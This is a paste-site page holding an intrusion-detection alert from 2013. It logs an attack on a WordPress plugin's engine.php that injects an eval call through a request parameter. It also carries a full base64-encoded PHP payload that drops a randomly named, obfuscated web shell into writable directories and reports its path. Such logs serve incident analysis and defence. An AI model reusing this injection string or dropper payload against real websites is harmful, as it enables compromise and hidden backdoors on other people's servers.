IDS alert

From cm3l1k1, 5 Years ago, written in Plain Text, viewed 402 times.
URL http://paste.security-portal.cz/view/3cb48cd1 Embed
Download Paste or View Raw
  1. IP: 188.143.232.128 (188.143.232.128, 188.143.232.128)
  2. Date: 2013-01-14T04:12:03+00:00
  3. Impact: 78
  4. Affected tags: xss csrf id rfe lfi sqli
  5. Affected parameters: REQUEST.type=ih_options%28%29%3Beval%28stripslashes%28%24_REQUEST%5Bcmd%5D%29%29%3Berror, REQUEST.cmd=eval%28base64_decode%28%5C%27JGRyID0gJF9TRVJWRVJbIkRPQ1VNRU5UX1JPT1QiXTskcmFuPXJhbmQoNSw3KTsNCmZvcigkaTskaTwkcmFuOyRpKyspICRzbi49Y2hyKHJhbmQoOTcsMTIyKSk7DQokc24gLj0gJy5waHAnOw0KJGdkYXJyID0gYXJyYXkoKTsNCmlmIChpc193cml0ZWFibGUoJGRyKSkgJGdkYXJyW109Jyc7DQppZiAoJGRpciA9IEBvcGVuZGlyKCRkcikpIHsNCgl3aGlsZSAoZmFsc2UgIT09ICgkZmlsZSA9IHJlYWRkaXIoJGRpcikpKSB7DQoJCSRwZmlsZSA9ICRkci4nLycuJGZpbGU7DQoJCWlmICgkZmlsZSE9Jy4nICYmICRmaWxlIT0nLi4nKSB7DQoJCQlpZiAoaXNfZGlyKCRwZmlsZSkgJiYgaXNfd3JpdGVhYmxlKCRwZmlsZSkpICRnZGFycltdPScvJy4kZmlsZTsNCgkJfQ0KCX0NCn0NCmlmIChjb3VudCgkZ2RhcnIpID09IDApIGRpZSgnJyk7DQokc3BuID0gJGdkYXJyW3JhbmQoMCxjb3VudCgkZ2RhcnIpLTEpXS4nLycuJHNuOw0KaWYoJGY9Zm9wZW4oJGRyLiRzcG4sJ3cnKSl7DQoJZnB1dHMoJGYsIjw%2FcGhwIC8qVi5IWSlvKi9ldmFsLyppUGxeZGcqLygvKj9WSGtTfiovYmFzZTY0X2RlY29kZS8qXTk%2FNyovKC8qMD5sPGhSKi8nTHlvbGNrNXBPMVlxTDJWMllXd3ZLa1oyVnpJcUx5Z3ZLbnhlTVhkSU96VX
  6.  FMMkpoYzJVMk5GOWtaV052WkdVdktqRmdRM0ZVS2k4b0x5cE9PVnRjY0dRcUx5ZE1lVzh3WXpKQ1lrdHBPWEJhYVRoeFlqQjRLMXBEYjNaTFF6aHhXRmNuTHlwUVp6NWtNamhLS2k4dUx5cFBaajQyVkNvdkp6bHknLypsbS59PHRKKi8uLyo9TWxDTTZQKi8nVUZZNVJFdHBPWEJqTTA1c1pFTTRjV013TVZCWVNIUkdTMms0YnljdkttSllQazRxTHk0dkttOCtOWHhsS2k4blRIbHdiR1ZYZHpOUmExRnhUSGxTWmxWclZsSldWVlpVVmtNNGNWbFlKeThxZG1sZU15b3ZMaThxU1ZCbE0xOXJLaThuYURkbFZXaEdURU52ZGxkNU9IRkxNRVpJVFhwQmJVdHAnLyowdnI3ISovLi8qM2hsRFlsKi8nT0c1YVZ6QnVKeThxUURBdEtpOHVMeW9zUkVFblBYZHhLaThuVEhsdmQwMVdlRWRrUTI5MlRHazRjVWxWTlRWUlV6RllTMms0YmxsdUp5OHFKbGRWT1U1eFNWd3FMeTR2S2lBek9EcEtLaThuYTI1TWVYQldVVU5qTDB0cE9IVk1lWEJ1VlZoWkwwdHBPRzVrUjBwcEp5OHFjWHBHVkNvdkxpOHEnLypPNCVoR350Ki8uLypdMTsqLydVVllyUFNvdkowcDVPSEZUV0VKTVpIbHZkbGhUT0hGaWJUVXlXSHBqY1V4NU9IRlNWeWN2S2tNK1RqMUVNVXNxTHk0dkttaHhiMllxTHlkM0wwdFRiM1pMVXpoeFZWaFJjMWRyYjNGTWVUaHhTbGhCYkV4WFJYRW5MeXBwVDJvcUx5NHZLbVUzTml4UEtpOG5USGxyZGt0dU5HMVRNMDF4VERKVycvKnk7dV19cyovLi8qSXg9Ki8nTWxsWGQzWkxiRXBYV0dsdmRrdERKeThxZXpBMVZVRkNhaW92TGk4cVp
  7.  ITS9kSHhFS2k4bk9IRlNXRFFyVHpGb1RFdHBPWHBrU0Vwd1kwaE9jMWxZVG05YVdFMTJKeThxYkZJMmNDb3ZMaThxTUcxUlVqNHJLaThuUzJsQksxRkdTa3RhV0dOeFRIbG5ka3RyVml0V1dGVnhUSGxTWmxWckp5OHEnLypQQTpOLHoqLy4vKm1RQTMyMCovJ1lIRmFUQ292TGk4cVZTRTZLaThuVmxKV1ZWWlVWa000Y1dGVGR6TkxlbGx0UzJrNVlreDVjSEZRTVZwUEp5OHFLVDV6WlNvdkxpOHFhSHc4YWtScEtpOG5Zak5aY1V4NVpHeGlWMGx1VEhsd1MxUkdaelJoYWpGaVVGTnZka3hwSnk4cWJTVW1QbWhTS2k4dUx5cFJWbFZ2U1ZvcUx5YzRjVXRGJy8qZEwyKi8uLyptLF1lM0UqLydhMjVOVTI5MlNqTnNNRmx0U1c1TWVYQTFVVWhDV1dKVlkzRW5MeW8xUG1rME1pb3ZMaThxVjFSd2ZDb3ZKMHd4TUhaTGFtUlpTVU5XY0ZKc01IRk1lVGh4VGtOa1MySjVkM0ZNZVNjdktpaDNQQ292TGk4cWJ5Z3pSRHB0S2k4bmEzWkxiWE1yWmxSa1lVdHBPSFpMYVdRNFVsTTBjVXg1YTNaTCcvKko2UHAqLy4vKk56PiovJ2EwbG5KeThxT0U1Z2Ftc3FMeTR2S2pjMk5qdGlmaW92SjFkcU5VdFpRMVZ4VEhrNGNWVjVWaXRPV0ZaWVYwTnZkazk1T0hGT2VVVTFXV2x2ZGljdktrWXhaQ292S1M4cUprZEVLV040S2k4dkttMVVlMnB2UENvdktTOHFieXhzT0NrdUtpOHZLbFpTYlNZcUx6c3ZLaWxHS0dFclQyVXFMdz09Jy8qckJaS0swKi8pLypDbkgwYEQpaCovLypjYiYzKi8pLypdUlY7LiovLypgTSstUygqLzsvKltRIFMqLyA%2FPi
  8.  IpOw0KCWZjbG9zZSgkZik7DQoJZWNobygnPHNoZScuJ2xscGF0aD4nKTsNCgllY2hvKCRzcG4pOw0KCWVjaG8oJzwvc2hlbGxwYXRoPicpOw0KfQ0KZGllKCk7%5C%27%29%29%3B, GET.type=ih_options%28%29%3Beval%28stripslashes%28%24_REQUEST%5Bcmd%5D%29%29%3Berror, POST.cmd=eval%28base64_decode%28%5C%27JGRyID0gJF9TRVJWRVJbIkRPQ1VNRU5UX1JPT1QiXTskcmFuPXJhbmQoNSw3KTsNCmZvcigkaTskaTwkcmFuOyRpKyspICRzbi49Y2hyKHJhbmQoOTcsMTIyKSk7DQokc24gLj0gJy5waHAnOw0KJGdkYXJyID0gYXJyYXkoKTsNCmlmIChpc193cml0ZWFibGUoJGRyKSkgJGdkYXJyW109Jyc7DQppZiAoJGRpciA9IEBvcGVuZGlyKCRkcikpIHsNCgl3aGlsZSAoZmFsc2UgIT09ICgkZmlsZSA9IHJlYWRkaXIoJGRpcikpKSB7DQoJCSRwZmlsZSA9ICRkci4nLycuJGZpbGU7DQoJCWlmICgkZmlsZSE9Jy4nICYmICRmaWxlIT0nLi4nKSB7DQoJCQlpZiAoaXNfZGlyKCRwZmlsZSkgJiYgaXNfd3JpdGVhYmxlKCRwZmlsZSkpICRnZGFycltdPScvJy4kZmlsZTsNCgkJfQ0KCX0NCn0NCmlmIChjb3VudCgkZ2RhcnIpID09IDApIGRpZSgnJyk7DQokc3BuID0gJGdkYXJyW3JhbmQoMCxjb3VudCgkZ2RhcnIpLTEpXS4nLycuJHNuOw0KaWYoJGY9Zm9wZW4oJGRyLiRzcG4sJ3cnKSl7DQoJZnB1dHMoJGYsIjw%2FcGhwIC8qVi5IWSlvKi9ldmFsLyppUGxeZGcqLygvKj9W
  9.  SGtTfiovYmFzZTY0X2RlY29kZS8qXTk%2FNyovKC8qMD5sPGhSKi8nTHlvbGNrNXBPMVlxTDJWMllXd3ZLa1oyVnpJcUx5Z3ZLbnhlTVhkSU96VXFMMkpoYzJVMk5GOWtaV052WkdVdktqRmdRM0ZVS2k4b0x5cE9PVnRjY0dRcUx5ZE1lVzh3WXpKQ1lrdHBPWEJhYVRoeFlqQjRLMXBEYjNaTFF6aHhXRmNuTHlwUVp6NWtNamhLS2k4dUx5cFBaajQyVkNvdkp6bHknLypsbS59PHRKKi8uLyo9TWxDTTZQKi8nVUZZNVJFdHBPWEJqTTA1c1pFTTRjV013TVZCWVNIUkdTMms0YnljdkttSllQazRxTHk0dkttOCtOWHhsS2k4blRIbHdiR1ZYZHpOUmExRnhUSGxTWmxWclZsSldWVlpVVmtNNGNWbFlKeThxZG1sZU15b3ZMaThxU1ZCbE0xOXJLaThuYURkbFZXaEdURU52ZGxkNU9IRkxNRVpJVFhwQmJVdHAnLyowdnI3ISovLi8qM2hsRFlsKi8nT0c1YVZ6QnVKeThxUURBdEtpOHVMeW9zUkVFblBYZHhLaThuVEhsdmQwMVdlRWRrUTI5MlRHazRjVWxWTlRWUlV6RllTMms0YmxsdUp5OHFKbGRWT1U1eFNWd3FMeTR2S2lBek9EcEtLaThuYTI1TWVYQldVVU5qTDB0cE9IVk1lWEJ1VlZoWkwwdHBPRzVrUjBwcEp5OHFjWHBHVkNvdkxpOHEnLypPNCVoR350Ki8uLypdMTsqLydVVllyUFNvdkowcDVPSEZUV0VKTVpIbHZkbGhUT0hGaWJUVXlXSHBqY1V4NU9IRlNWeWN2S2tNK1RqMUVNVXNxTHk0dkttaHhiMllxTHlkM0wwdFRiM1pMVXpoeFZWaFJjMWRyYjNGTWVUaHhTbGhCYkV4WFJYRW5MeXBwVDJvcUx5NHZLbVUzTml4UEt
  10.  pOG5USGxyZGt0dU5HMVRNMDF4VERKVycvKnk7dV19cyovLi8qSXg9Ki8nTWxsWGQzWkxiRXBYV0dsdmRrdERKeThxZXpBMVZVRkNhaW92TGk4cVpITS9kSHhFS2k4bk9IRlNXRFFyVHpGb1RFdHBPWHBrU0Vwd1kwaE9jMWxZVG05YVdFMTJKeThxYkZJMmNDb3ZMaThxTUcxUlVqNHJLaThuUzJsQksxRkdTa3RhV0dOeFRIbG5ka3RyVml0V1dGVnhUSGxTWmxWckp5OHEnLypQQTpOLHoqLy4vKm1RQTMyMCovJ1lIRmFUQ292TGk4cVZTRTZLaThuVmxKV1ZWWlVWa000Y1dGVGR6TkxlbGx0UzJrNVlreDVjSEZRTVZwUEp5OHFLVDV6WlNvdkxpOHFhSHc4YWtScEtpOG5Zak5aY1V4NVpHeGlWMGx1VEhsd1MxUkdaelJoYWpGaVVGTnZka3hwSnk4cWJTVW1QbWhTS2k4dUx5cFJWbFZ2U1ZvcUx5YzRjVXRGJy8qZEwyKi8uLyptLF1lM0UqLydhMjVOVTI5MlNqTnNNRmx0U1c1TWVYQTFVVWhDV1dKVlkzRW5MeW8xUG1rME1pb3ZMaThxVjFSd2ZDb3ZKMHd4TUhaTGFtUlpTVU5XY0ZKc01IRk1lVGh4VGtOa1MySjVkM0ZNZVNjdktpaDNQQ292TGk4cWJ5Z3pSRHB0S2k4bmEzWkxiWE1yWmxSa1lVdHBPSFpMYVdRNFVsTTBjVXg1YTNaTCcvKko2UHAqLy4vKk56PiovJ2EwbG5KeThxT0U1Z2Ftc3FMeTR2S2pjMk5qdGlmaW92SjFkcU5VdFpRMVZ4VEhrNGNWVjVWaXRPV0ZaWVYwTnZkazk1T0hGT2VVVTFXV2x2ZGljdktrWXhaQ292S1M4cUprZEVLV040S2k4dkttMVVlMnB2UENvdktTOHFieXhzT0NrdUtpOHZLbFpTYlNZcUx6
  11.  c3ZLaWxHS0dFclQyVXFMdz09Jy8qckJaS0swKi8pLypDbkgwYEQpaCovLypjYiYzKi8pLypdUlY7LiovLypgTSstUygqLzsvKltRIFMqLyA%2FPiIpOw0KCWZjbG9zZSgkZik7DQoJZWNobygnPHNoZScuJ2xscGF0aD4nKTsNCgllY2hvKCRzcG4pOw0KCWVjaG8oJzwvc2hlbGxwYXRoPicpOw0KfQ0KZGllKCk7%5C%27%29%29%3B,
  12. Request URI: /wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(stripslashes($_REQUEST%5Bcmd%5D));error

Reply to "IDS alert"

Here you can reply to the paste above